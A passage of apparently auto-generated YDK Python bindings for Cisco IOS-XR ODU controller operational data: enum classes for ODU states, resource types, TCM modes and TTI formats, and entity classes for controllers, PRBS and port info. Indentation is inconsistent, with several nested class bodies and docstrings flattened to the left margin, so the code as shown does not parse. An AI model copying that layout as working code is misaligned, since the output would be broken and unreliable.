    zero_astm1_mapping_into_opu0 = Enum.YLeaf(10, "zero-astm1-mapping-into-opu0")
    zero_bstm4_mapping_into_opu0 = Enum.YLeaf(11, "zero-bstm4-mapping-into-opu0")
    twenty_odu_multiplex_structure_supporting_odt_ujk = Enum.YLeaf(32, "twenty-odu-multiplex-structure-supporting-odt-ujk")
    twenty_one_odu_multiplex_structure_supporting_odt_ujk_and_odt_ukts = Enum.YLeaf(33, "twenty-one-odu-multiplex-structure-supporting-odt-ujk-and-odt-ukts")

    @staticmethod
    def _meta_info():
        # Lazy import: metadata tables are only loaded when requested
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['OduPtTypeEt']
class OduResourceEt(Enum):
    """
    OduResourceEt (Enum Class)

    Odu resource et. Values: resource_free (0), open_connection (1),
    cross_connection (2), channelized (3), loopbacked (4),
    cross_connected_and_loopbacked (5), terminated (6), invalid (7).
    """

    resource_free = Enum.YLeaf(0, "resource-free")
    open_connection = Enum.YLeaf(1, "open-connection")
    cross_connection = Enum.YLeaf(2, "cross-connection")
    channelized = Enum.YLeaf(3, "channelized")
    loopbacked = Enum.YLeaf(4, "loopbacked")
    cross_connected_and_loopbacked = Enum.YLeaf(5, "cross-connected-and-loopbacked")
    terminated = Enum.YLeaf(6, "terminated")
    invalid = Enum.YLeaf(7, "invalid")

    @staticmethod
    def _meta_info():
        # Lazy import: metadata tables are only loaded when requested
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['OduResourceEt']
class OduSecState(Enum):
    """
    OduSecState (Enum Class)

    Odu sec state. Values: normal (0), maintenance (1),
    ains (2, Automatic In Service).
    """

    normal = Enum.YLeaf(0, "normal")
    maintenance = Enum.YLeaf(1, "maintenance")
    ains = Enum.YLeaf(2, "ains")

    @staticmethod
    def _meta_info():
        # Lazy import: metadata tables are only loaded when requested
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['OduSecState']
class OduStateEt(Enum):
    """
    OduStateEt (Enum Class)

    Odu state et. Values: not_ready (0), admin_down (1), down (2), up (3),
    shutdown (4), error_disable (5), down_immediate (6),
    down_immediate_admin (7), down_graceful (8), begin_shutdown (9),
    end_shutdown (10), begin_error_disable (11), end_error_disable (12),
    begin_down_graceful (13), reset (14), operational (15),
    not_operational (16), unknown (17), last (18).
    """

    not_ready = Enum.YLeaf(0, "not-ready")
    admin_down = Enum.YLeaf(1, "admin-down")
    down = Enum.YLeaf(2, "down")
    up = Enum.YLeaf(3, "up")
    shutdown = Enum.YLeaf(4, "shutdown")
    error_disable = Enum.YLeaf(5, "error-disable")
    down_immediate = Enum.YLeaf(6, "down-immediate")
    down_immediate_admin = Enum.YLeaf(7, "down-immediate-admin")
    down_graceful = Enum.YLeaf(8, "down-graceful")
    begin_shutdown = Enum.YLeaf(9, "begin-shutdown")
    end_shutdown = Enum.YLeaf(10, "end-shutdown")
    begin_error_disable = Enum.YLeaf(11, "begin-error-disable")
    end_error_disable = Enum.YLeaf(12, "end-error-disable")
    begin_down_graceful = Enum.YLeaf(13, "begin-down-graceful")
    reset = Enum.YLeaf(14, "reset")
    operational = Enum.YLeaf(15, "operational")
    not_operational = Enum.YLeaf(16, "not-operational")
    unknown = Enum.YLeaf(17, "unknown")
    last = Enum.YLeaf(18, "last")

    @staticmethod
    def _meta_info():
        # Lazy import: metadata tables are only loaded when requested
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['OduStateEt']
class OduTcmMode(Enum):
    """
    OduTcmMode (Enum Class)

    Odu tcm mode. Values: odu_tcm_mode_trans_parent (0, Transparent),
    nim (1, Non-Intrusive Monitor), oper (2, Operational).
    """

    odu_tcm_mode_trans_parent = Enum.YLeaf(0, "odu-tcm-mode-trans-parent")
    nim = Enum.YLeaf(1, "nim")
    oper = Enum.YLeaf(2, "oper")

    @staticmethod
    def _meta_info():
        # Lazy import: metadata tables are only loaded when requested
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['OduTcmMode']
class OduTcmPerMon(Enum):
    """
    OduTcmPerMon (Enum Class)

    Odu tcm per mon. Values: disable (0), enable (1).
    """

    disable = Enum.YLeaf(0, "disable")
    enable = Enum.YLeaf(1, "enable")

    @staticmethod
    def _meta_info():
        # Lazy import: metadata tables are only loaded when requested
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['OduTcmPerMon']
class OduTcmStateEt(Enum):
    """
    OduTcmStateEt (Enum Class)

    Odu tcm state et. Values: disable (0), enable (1).
    """

    disable = Enum.YLeaf(0, "disable")
    enable = Enum.YLeaf(1, "enable")

    @staticmethod
    def _meta_info():
        # Lazy import: metadata tables are only loaded when requested
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['OduTcmStateEt']
class OduTsGEt(Enum):
    """
    OduTsGEt (Enum Class)

    Odu ts g et (tributary slot granularity). Values:
    one_dot_two_five_g (0, 1.25G), two_dot_five_g (1, 2.5G),
    tsg_not_applicable (2, NA).
    """

    one_dot_two_five_g = Enum.YLeaf(0, "one-dot-two-five-g")
    two_dot_five_g = Enum.YLeaf(1, "two-dot-five-g")
    tsg_not_applicable = Enum.YLeaf(2, "tsg-not-applicable")

    @staticmethod
    def _meta_info():
        # Lazy import: metadata tables are only loaded when requested
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['OduTsGEt']
class OduTtiEt(Enum):
    """
    OduTtiEt (Enum Class)

    Odu tti et. Values: ascii (0), hex (1), full_ascii (2, FULL ASCII),
    full_hex (3, FULL HEX).
    """

    ascii = Enum.YLeaf(0, "ascii")
    hex = Enum.YLeaf(1, "hex")
    full_ascii = Enum.YLeaf(2, "full-ascii")
    full_hex = Enum.YLeaf(3, "full-hex")

    @staticmethod
    def _meta_info():
        # Lazy import: metadata tables are only loaded when requested
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['OduTtiEt']
class OduUserEt(Enum):
    """
    OduUserEt (Enum Class)

    Odu user et. Values: mp (0, MP), gmpls (1, GMPLS), all (2, All).
    """

    mp = Enum.YLeaf(0, "mp")
    gmpls = Enum.YLeaf(1, "gmpls")
    all = Enum.YLeaf(2, "all")

    @staticmethod
    def _meta_info():
        # Lazy import: metadata tables are only loaded when requested
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['OduUserEt']
class OtmMplsLibC(Enum):
    """
    OtmMplsLibC (Enum Class)

    Otm mpls lib c. Values: otm_mpls_lib_c_type_null (0),
    otm_mpls_lib_c_type_ipv4 (1), otm_mpls_lib_c_type_ipv4_p2p_tunnel (7),
    otm_mpls_lib_c_type_ipv6_p2p_tunnel (8), otm_mpls_lib_c_type_ipv4_uni (9),
    otm_mpls_lib_c_type_ipv4_p2mp_tunnel (13),
    otm_mpls_lib_c_type_ipv6_p2mp_tunnel (14),
    otm_mpls_lib_c_type_ipv4_tp_tunnel (15),
    otm_mpls_lib_c_type_ipv6_tp_tunnel (16).
    """

    otm_mpls_lib_c_type_null = Enum.YLeaf(0, "otm-mpls-lib-c-type-null")
    otm_mpls_lib_c_type_ipv4 = Enum.YLeaf(1, "otm-mpls-lib-c-type-ipv4")
    otm_mpls_lib_c_type_ipv4_p2p_tunnel = Enum.YLeaf(7, "otm-mpls-lib-c-type-ipv4-p2p-tunnel")
    otm_mpls_lib_c_type_ipv6_p2p_tunnel = Enum.YLeaf(8, "otm-mpls-lib-c-type-ipv6-p2p-tunnel")
    otm_mpls_lib_c_type_ipv4_uni = Enum.YLeaf(9, "otm-mpls-lib-c-type-ipv4-uni")
    otm_mpls_lib_c_type_ipv4_p2mp_tunnel = Enum.YLeaf(13, "otm-mpls-lib-c-type-ipv4-p2mp-tunnel")
    otm_mpls_lib_c_type_ipv6_p2mp_tunnel = Enum.YLeaf(14, "otm-mpls-lib-c-type-ipv6-p2mp-tunnel")
    otm_mpls_lib_c_type_ipv4_tp_tunnel = Enum.YLeaf(15, "otm-mpls-lib-c-type-ipv4-tp-tunnel")
    otm_mpls_lib_c_type_ipv6_tp_tunnel = Enum.YLeaf(16, "otm-mpls-lib-c-type-ipv6-tp-tunnel")

    @staticmethod
    def _meta_info():
        # Lazy import: metadata tables are only loaded when requested
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['OtmMplsLibC']
class OtmOpticalRmCtxt(Enum):
    """
    OtmOpticalRmCtxt (Enum Class)

    Otm optical rm ctxt

    .. data:: otm_opt_rm_ctxt_type_none = 0

        NONE

    .. data:: otm_opt_rm_ctxt_type_down_stream_rw_add = 1

        DOWNSTREAM RW ADD

    .. data:: otm_opt_rm_ctxt_type_up_stream_rw_add = 2

        UPSTREAM RW ADD

    .. data:: otm_opt_rm_ctxt_type_down_stream_rw_del = 3

        DOWNSTREAM RW DEL

    .. data:: otm_opt_rm_ctxt_type_up_stream_rw_del = 4

        UPSTREAM RW DEL

    .. data:: otm_opt_rm_ctxt_type_down_stream_lbl_get = 5

        DOWNSTREAM LBL GET

    .. data:: otm_opt_rm_ctxt_type_up_stream_lbl_get = 6

        UPSTREAM LBL GET

    .. data:: otm_opt_rm_ctxt_type_down_stream_lbl_rel = 7

        DOWNSTREAM LBL REL

    .. data:: otm_opt_rm_ctxt_type_up_stream_lbl_rel = 8

        UPSTREAM LBL REL

    .. data:: otm_opt_rm_ctxt_type_end_point_rw_add = 9

        ENDPOINT RW ADD

    .. data:: otm_opt_rm_ctxt_type_end_point_rw_del = 10

        ENDPOINT RW DEL

    .. data:: otm_opt_rm_ctxt_type_odu_group_add = 11

        ODU GROUP ADD

    .. data:: otm_opt_rm_ctxt_type_odu_group_del = 12

        ODU GROUP DEL

    .. data:: otm_optical_rm_ctxt_type_last = 13

        LAST

    """

    # Value/identifier pairs mirror the YANG enum; *_last marks the
    # sentinel end value.
    otm_opt_rm_ctxt_type_none = Enum.YLeaf(0, "otm-opt-rm-ctxt-type-none")
    otm_opt_rm_ctxt_type_down_stream_rw_add = Enum.YLeaf(1, "otm-opt-rm-ctxt-type-down-stream-rw-add")
    otm_opt_rm_ctxt_type_up_stream_rw_add = Enum.YLeaf(2, "otm-opt-rm-ctxt-type-up-stream-rw-add")
    otm_opt_rm_ctxt_type_down_stream_rw_del = Enum.YLeaf(3, "otm-opt-rm-ctxt-type-down-stream-rw-del")
    otm_opt_rm_ctxt_type_up_stream_rw_del = Enum.YLeaf(4, "otm-opt-rm-ctxt-type-up-stream-rw-del")
    otm_opt_rm_ctxt_type_down_stream_lbl_get = Enum.YLeaf(5, "otm-opt-rm-ctxt-type-down-stream-lbl-get")
    otm_opt_rm_ctxt_type_up_stream_lbl_get = Enum.YLeaf(6, "otm-opt-rm-ctxt-type-up-stream-lbl-get")
    otm_opt_rm_ctxt_type_down_stream_lbl_rel = Enum.YLeaf(7, "otm-opt-rm-ctxt-type-down-stream-lbl-rel")
    otm_opt_rm_ctxt_type_up_stream_lbl_rel = Enum.YLeaf(8, "otm-opt-rm-ctxt-type-up-stream-lbl-rel")
    otm_opt_rm_ctxt_type_end_point_rw_add = Enum.YLeaf(9, "otm-opt-rm-ctxt-type-end-point-rw-add")
    otm_opt_rm_ctxt_type_end_point_rw_del = Enum.YLeaf(10, "otm-opt-rm-ctxt-type-end-point-rw-del")
    otm_opt_rm_ctxt_type_odu_group_add = Enum.YLeaf(11, "otm-opt-rm-ctxt-type-odu-group-add")
    otm_opt_rm_ctxt_type_odu_group_del = Enum.YLeaf(12, "otm-opt-rm-ctxt-type-odu-group-del")
    otm_optical_rm_ctxt_type_last = Enum.YLeaf(13, "otm-optical-rm-ctxt-type-last")

    @staticmethod
    def _meta_info():
        # Lazy import of the generated meta module.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['OtmOpticalRmCtxt']
class OtmOpticalRmCtxtRm(Enum):
    """
    OtmOpticalRmCtxtRm (Enum Class)

    Otm optical rm ctxt rm

    .. data:: otm_opt_rm_ctxt_rm_none = 0

        NONE

    .. data:: otm_opt_rm_ctxt_rm_wdm = 1

        WDM

    .. data:: otm_opt_rm_ctxt_rm_fsc = 2

        FSC

    .. data:: otm_opt_rm_ctxt_rm_tdm = 3

        TDM

    .. data:: otm_opt_rm_ctxt_rm_g709_otn = 4

        G709 OTN

    .. data:: otm_optical_rm_ctxt_rm_last = 5

        LAST

    """

    # Value/identifier pairs mirror the YANG enum; *_last is the sentinel.
    otm_opt_rm_ctxt_rm_none = Enum.YLeaf(0, "otm-opt-rm-ctxt-rm-none")
    otm_opt_rm_ctxt_rm_wdm = Enum.YLeaf(1, "otm-opt-rm-ctxt-rm-wdm")
    otm_opt_rm_ctxt_rm_fsc = Enum.YLeaf(2, "otm-opt-rm-ctxt-rm-fsc")
    otm_opt_rm_ctxt_rm_tdm = Enum.YLeaf(3, "otm-opt-rm-ctxt-rm-tdm")
    otm_opt_rm_ctxt_rm_g709_otn = Enum.YLeaf(4, "otm-opt-rm-ctxt-rm-g709-otn")
    otm_optical_rm_ctxt_rm_last = Enum.YLeaf(5, "otm-optical-rm-ctxt-rm-last")

    @staticmethod
    def _meta_info():
        # Lazy import of the generated meta module.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['OtmOpticalRmCtxtRm']
class OtmTeTunnelInfo(Enum):
    """
    OtmTeTunnelInfo (Enum Class)

    Otm te tunnel info

    .. data:: otm_te_info_none = 0

        NONE

    .. data:: otm_te_info_s2l = 1

        S2L

    .. data:: otm_te_info_tunnel_id = 2

        ID

    .. data:: otm_te_info_passive_match = 3

        MAT

    """

    # Value/identifier pairs mirror the YANG enum.
    otm_te_info_none = Enum.YLeaf(0, "otm-te-info-none")
    otm_te_info_s2l = Enum.YLeaf(1, "otm-te-info-s2l")
    otm_te_info_tunnel_id = Enum.YLeaf(2, "otm-te-info-tunnel-id")
    otm_te_info_passive_match = Enum.YLeaf(3, "otm-te-info-passive-match")

    @staticmethod
    def _meta_info():
        # Lazy import of the generated meta module.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['OtmTeTunnelInfo']
class Odu(_Entity_):
"""
ODU operational data
.. attribute:: controllers
All ODU Port operational data
**type**\: :py:class:`Controllers <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers>`
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
    """Build the top-level ODU entity and wire its child containers."""
    # Python 2/3 compatible super() call.
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(Odu, self).__init__()
    self._top_entity = None

    self.yang_name = "odu"
    self.yang_parent_name = "Cisco-IOS-XR-controller-odu-oper"
    self.is_top_level_class = True
    self.has_list_ancestor = False
    self.ylist_key_names = []
    # Maps YANG child name -> (python attribute name, child class).
    self._child_classes = OrderedDict([("controllers", ("controllers", Odu.Controllers))])
    self._leafs = OrderedDict()  # no leaf nodes at this level

    self.controllers = Odu.Controllers()
    self.controllers.parent = self
    self._children_name_map["controllers"] = "controllers"
    self._segment_path = lambda: "Cisco-IOS-XR-controller-odu-oper:odu"
    # Set last, after all construction-time assignments are done.
    self._is_frozen = True
def __setattr__(self, name, value):
    # Delegate every attribute write to YDK's setter machinery;
    # this top-level class has no list-key leaf names.
    self._perform_setattr(Odu, [], name, value)
class Controllers(_Entity_):
"""
All ODU Port operational data
.. attribute:: controller
ODU Port operational data
**type**\: list of :py:class:`Controller <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller>`
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
    """Build the 'controllers' container holding the Controller list."""
    # Python 2/3 compatible super() call.
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(Odu.Controllers, self).__init__()

    self.yang_name = "controllers"
    self.yang_parent_name = "odu"
    self.is_top_level_class = False
    self.has_list_ancestor = False
    self.ylist_key_names = []
    # Maps YANG child name -> (python attribute name, child class).
    self._child_classes = OrderedDict([("controller", ("controller", Odu.Controllers.Controller))])
    self._leafs = OrderedDict()  # container has no leaf nodes

    # YANG list node: zero or more Controller entries.
    self.controller = YList(self)
    self._segment_path = lambda: "controllers"
    self._absolute_path = lambda: "Cisco-IOS-XR-controller-odu-oper:odu/%s" % self._segment_path()
    # Set last, after all construction-time assignments are done.
    self._is_frozen = True
def __setattr__(self, name, value):
    # Delegate attribute writes to YDK's setter machinery; no key leafs.
    self._perform_setattr(Odu.Controllers, [], name, value)
class Controller(_Entity_):
"""
ODU Port operational data
.. attribute:: controller_name (key)
Port name
**type**\: str
**pattern:** [a\-zA\-Z0\-9.\_/\-]+
**config**\: False
.. attribute:: prbs
ODU port operational data
**type**\: :py:class:`Prbs <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Prbs>`
**config**\: False
.. attribute:: info
ODU port operational data
**type**\: :py:class:`Info <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info>`
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
    """Build one Controller list entry, keyed by controller_name."""
    # Python 2/3 compatible super() call.
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(Odu.Controllers.Controller, self).__init__()

    self.yang_name = "controller"
    self.yang_parent_name = "controllers"
    self.is_top_level_class = False
    self.has_list_ancestor = False
    # 'controller_name' is the YANG list key for this entry.
    self.ylist_key_names = ['controller_name']
    # Maps YANG child name -> (python attribute name, child class).
    self._child_classes = OrderedDict([("prbs", ("prbs", Odu.Controllers.Controller.Prbs)), ("info", ("info", Odu.Controllers.Controller.Info))])
    self._leafs = OrderedDict([
        ('controller_name', (YLeaf(YType.str, 'controller-name'), ['str'])),
    ])
    self.controller_name = None

    self.prbs = Odu.Controllers.Controller.Prbs()
    self.prbs.parent = self
    self._children_name_map["prbs"] = "prbs"

    self.info = Odu.Controllers.Controller.Info()
    self.info.parent = self
    self._children_name_map["info"] = "info"

    # List-entry path embeds the key value as a predicate.
    self._segment_path = lambda: "controller" + "[controller-name='" + str(self.controller_name) + "']"
    self._absolute_path = lambda: "Cisco-IOS-XR-controller-odu-oper:odu/controllers/%s" % self._segment_path()
    # Set last, after all construction-time assignments are done.
    self._is_frozen = True
def __setattr__(self, name, value):
    # Delegate attribute writes; 'controller_name' is the list key leaf.
    self._perform_setattr(Odu.Controllers.Controller, ['controller_name'], name, value)
class Prbs(_Entity_):
    """
    ODU port operational data

    .. attribute:: odu_prbs_test

        odu prbs test
        **type**\: :py:class:`OduPrbsTest <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduPrbsTest>`

        **config**\: False

    .. attribute:: odu_prbs_mode

        odu prbs mode
        **type**\: :py:class:`OduPrbsMode <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduPrbsMode>`

        **config**\: False

    .. attribute:: odu_prbs_pattern

        odu prbs pattern
        **type**\: :py:class:`OduPrbsPattern <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduPrbsPattern>`

        **config**\: False

    .. attribute:: odu_prbs_status

        odu prbs status
        **type**\: :py:class:`OduPrbsStatus <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduPrbsStatus>`

        **config**\: False

    """

    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        """Build the 'prbs' container (four enumeration leafs, no children)."""
        # Python 2/3 compatible super() call.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Prbs, self).__init__()

        self.yang_name = "prbs"
        self.yang_parent_name = "controller"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('odu_prbs_test', (YLeaf(YType.enumeration, 'odu-prbs-test'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduPrbsTest', '')])),
            ('odu_prbs_mode', (YLeaf(YType.enumeration, 'odu-prbs-mode'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduPrbsMode', '')])),
            ('odu_prbs_pattern', (YLeaf(YType.enumeration, 'odu-prbs-pattern'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduPrbsPattern', '')])),
            ('odu_prbs_status', (YLeaf(YType.enumeration, 'odu-prbs-status'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduPrbsStatus', '')])),
        ])
        self.odu_prbs_test = None
        self.odu_prbs_mode = None
        self.odu_prbs_pattern = None
        self.odu_prbs_status = None
        self._segment_path = lambda: "prbs"
        # Set last, after all construction-time assignments are done.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Delegate attribute writes; lists the container's leaf names.
        self._perform_setattr(Odu.Controllers.Controller.Prbs, ['odu_prbs_test', 'odu_prbs_mode', 'odu_prbs_pattern', 'odu_prbs_status'], name, value)

    @staticmethod
    def _meta_info():
        # Lazy import of the generated meta module.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Prbs']['meta_info']
class Info(_Entity_):
"""
ODU port operational data
.. attribute:: local
TTI
**type**\: :py:class:`Local <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Local>`
**config**\: False
.. attribute:: remote
Remote
**type**\: :py:class:`Remote <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Remote>`
**config**\: False
.. attribute:: tti_mode
TTI
**type**\: :py:class:`TtiMode <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.TtiMode>`
**config**\: False
.. attribute:: odu_fwd_ref
ODU fwd\_ref
**type**\: :py:class:`OduFwdRef <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.OduFwdRef>`
**config**\: False
.. attribute:: alarm
Alarm
**type**\: :py:class:`Alarm <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm>`
**config**\: False
.. attribute:: te_ctx_data
Label Get Data
**type**\: :py:class:`TeCtxData <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.TeCtxData>`
**config**\: False
.. attribute:: xc_add_ctx_data
Xconnect Add Data
**type**\: :py:class:`XcAddCtxData <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.XcAddCtxData>`
**config**\: False
.. attribute:: xc_rem_ctx_data
Xconnect Remove Data
**type**\: :py:class:`XcRemCtxData <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.XcRemCtxData>`
**config**\: False
.. attribute:: odu_delay
ODU Delay
**type**\: :py:class:`OduDelay <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.OduDelay>`
**config**\: False
.. attribute:: odu_terminate_ether
odu terminate ether
**type**\: :py:class:`OduTerminateEther <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.OduTerminateEther>`
**config**\: False
.. attribute:: ains_info
AINS information
**type**\: :py:class:`AinsInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.AinsInfo>`
**config**\: False
.. attribute:: state
Admin State
**type**\: :py:class:`OduStateEt <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduStateEt>`
**config**\: False
.. attribute:: sf
SF in the form of 1.0E \- <SF>
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: sd
SD in the form of 1.0E \- <SD>
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: loopback_mode
Loopback
**type**\: :py:class:`OduLoopBackMode <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduLoopBackMode>`
**config**\: False
.. attribute:: derived_mode
Derived State
**type**\: :py:class:`OduDerState <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduDerState>`
**config**\: False
.. attribute:: inherit_sec_state
Sec State
**type**\: :py:class:`OduSecState <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduSecState>`
**config**\: False
.. attribute:: config_sec_state
Sec State
**type**\: :py:class:`OduSecState <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduSecState>`
**config**\: False
.. attribute:: gcc_mode
ODU GCC
**type**\: bool
**config**\: False
.. attribute:: child_name
Child Name
**type**\: str
**length:** 0..64
**config**\: False
.. attribute:: max_odu_child
ODU maximum no of children
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: od_uuser
ODU User
**type**\: :py:class:`OduUserEt <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduUserEt>`
**config**\: False
.. attribute:: resource_state
Resource State
**type**\: :py:class:`OduResourceEt <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduResourceEt>`
**config**\: False
.. attribute:: pt_type
PT type
**type**\: :py:class:`OduPtTypeEt <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduPtTypeEt>`
**config**\: False
.. attribute:: flex_type
FLEX type
**type**\: :py:class:`OduFlexTypeEt <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduFlexTypeEt>`
**config**\: False
.. attribute:: flex_bw
FLEX bw
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: flex_tolerence
FLEX tolerence
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: option
Option
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: tpn_value
TPN
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: num_ts
Number of TS
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: ts_g
TS Granuality
**type**\: :py:class:`OduTsGEt <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduTsGEt>`
**config**\: False
.. attribute:: ts_b
child ts bitmap
**type**\: str
**length:** 0..256
**config**\: False
.. attribute:: tpn_b
tpn bitmap
**type**\: str
**length:** 0..256
**config**\: False
.. attribute:: pts_b
ts bitmap
**type**\: str
**length:** 0..256
**config**\: False
.. attribute:: fwd_ref
fwd ref
**type**\: str
**length:** 0..64
**config**\: False
.. attribute:: xc_id
Xconnect ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: xconnect_name
Xconnect Name
**type**\: str
**config**\: False
.. attribute:: fwd_ref_ifhandle
fwd\_ref ifhandle
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: no_parent_slot
Number of parent slot
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: xc_resp_code
Odu Xconnect Response code
**type**\: :py:class:`DpProgrammed <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.DpProgrammed>`
**config**\: False
.. attribute:: performance_monitoring
Performance Monitoring
**type**\: :py:class:`OduPerMon <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduPerMon>`
**config**\: False
.. attribute:: pmtimca
PM TIM\-CA state
**type**\: :py:class:`OduPmCaEt <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduPmCaEt>`
**config**\: False
.. attribute:: pm_mode
ODU PM Mode
**type**\: :py:class:`OduPmMode <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduPmMode>`
**config**\: False
.. attribute:: nv_optical_support
NV Optical support
**type**\: bool
**config**\: False
.. attribute:: gmpls_tti_mode
tti mode
**type**\: :py:class:`GmplsTtiMode <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.GmplsTtiMode>`
**config**\: False
.. attribute:: gmpls_tcm_id
tcm id
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: odu
Child Ts
**type**\: list of :py:class:`Odu_ <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Odu_>`
**config**\: False
.. attribute:: odutcm
ODU TCM
**type**\: list of :py:class:`Odutcm <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Odutcm>`
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
    """Build the 'info' container: 35 leafs, 11 child containers, 2 lists."""
    # Python 2/3 compatible super() call.
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(Odu.Controllers.Controller.Info, self).__init__()

    self.yang_name = "info"
    self.yang_parent_name = "controller"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    # Maps YANG child name -> (python attribute name, child class).
